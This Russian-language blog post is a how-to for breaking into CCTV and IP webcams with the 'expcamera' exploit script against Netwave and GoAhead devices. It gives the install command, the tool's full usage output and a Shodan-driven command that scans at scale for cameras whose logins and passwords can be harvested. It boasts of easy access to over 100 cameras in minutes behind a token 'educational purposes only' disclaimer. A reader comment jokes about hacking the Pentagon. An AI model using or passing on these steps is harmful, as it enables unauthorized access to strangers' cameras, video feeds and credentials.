Взлом и проверка на уязвимости

Взлом веб-камер видеонаблюдения с помощью expcamera

Expcamera – скрипт для уязвимых камер видеонаблюдения, который использует Netwave и GoAhead. Netwave и GoAhead используются для получения IP-адреса камеры и для получения пароля к ней. Скрипт написан на языке программирования python3 и находиться в свободном доступе. Разумеется только для ознакомительных целей и никто не несет ответственности за ваши действия.

Обзор инструмента для взлома камер видеонаблюдений

Окружающая среда, которая требуется для работы скрипта: Linux, Python3.

Ссылка на скрипт.

Установка expcamera осуществляется следующей командой:

pip3 install -r related.txt

Использования скрипта стандартное, все возможности и список команд ниже:

python3 exploit_camera.py -h

usage: exploit_camera.py [-h] [-b {1,2}] [-o OUTPUTFILE] [-T TIMEOUT]
[-t TASKS] [-q | -v]
[-i IP | -l INPUTFILE | –shodan SHODAN | –zoomeye ZOOMEYE]

Exploit IP Camera. Please use it just in educational purpose!

optional arguments:
-h, –help show this help message and exit
-b {1,2},–brand {1,2}
Choose the brand of IP Camera. 1 represents Netwave,2
represents GoAhead.
-o OUTPUTFILE,–output OUTPUTFILE
Output into path you input.The default path in dir /tmp
-T TIMEOUT,–timeout TIMEOUT
The default timout for netwave is 300s.
-t TASKS,–task TASKS
Run TASKS number of connects in parallel,default is 10
-c COUNT,–count COUNT
The number of ip you want to get from ZoomEye.The maximum is 2000. Default is 100.
-q,–quiet Quiet mode.
-v,–verbose Show more informations.
-i IP,–ip IP The camera’s ip and port.Example: 192.168.1.100:80
-l INPUTFILE,–list INPUTFILE
The camera’s ip:port address file. The file’s format
like this 192.168.1.100:80 in a line.
–shodan SHODAN
Your Shodan API Key. You can get help from https://www.shodan.io/
–zoomeye ZOOMEYE
Your ZoomEye API Key. You can get help from https://www.zoomeye.org/api

expcamera found ip

Работа скрипта выглядит следующим образом, поиск ip-адресов, логинов и паролей к зараженным камерам видеонаблюдения.

Использование expcamera с поисковой системой Shodan

Мы уже говорили про поисковую систему Shodan, которая дает возможность получить доступ к слитым в сеть Ip-адресам и камерам. С ее помощью вы также можете проверить свой ПК на уязвимости.

Скрипт expcamera может работать с поисковой системой и очень эффективно находить зараженные Ip-адреса и подбирать пароли. За несколько минут можно найти более 100 веб-камер или камер видеонаблюдения, к которым можно будет легко подключится.

Для работы скрипта с Shodan требуется API ключ, который можно приобрести за 50$. Делать это или нет, решать вам, однако не забывайте, что за любые противозаконные действия есть ответственность.

Команда для начала сканирования камер видеонаблюдения:

python3 exploit_camera.py -b 2 -v –shodan (API Key)

Подключения к зараженной камере видеонаблюдения выглядит следующим образом.

Видео с зараженной камеры

Подписывайтесь на обновления сайта, а также наш Telegram.

nelus

Программист, SEO специалист, GEEK, увлекаюсь новостями из мира IT и безопасностью программного обеспечения.

2 комментариев

  1. Очень хорошая статья,с помощю твоего блога,я узнаю все больше и больше о взломах,думаю пиздануть пентагон,спасибо за то,что ты есть💜

    1. Спасибо большое, очень приятно читать такие комментарии! И тебе спасибо, выздоравливай!

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Back to top button
Close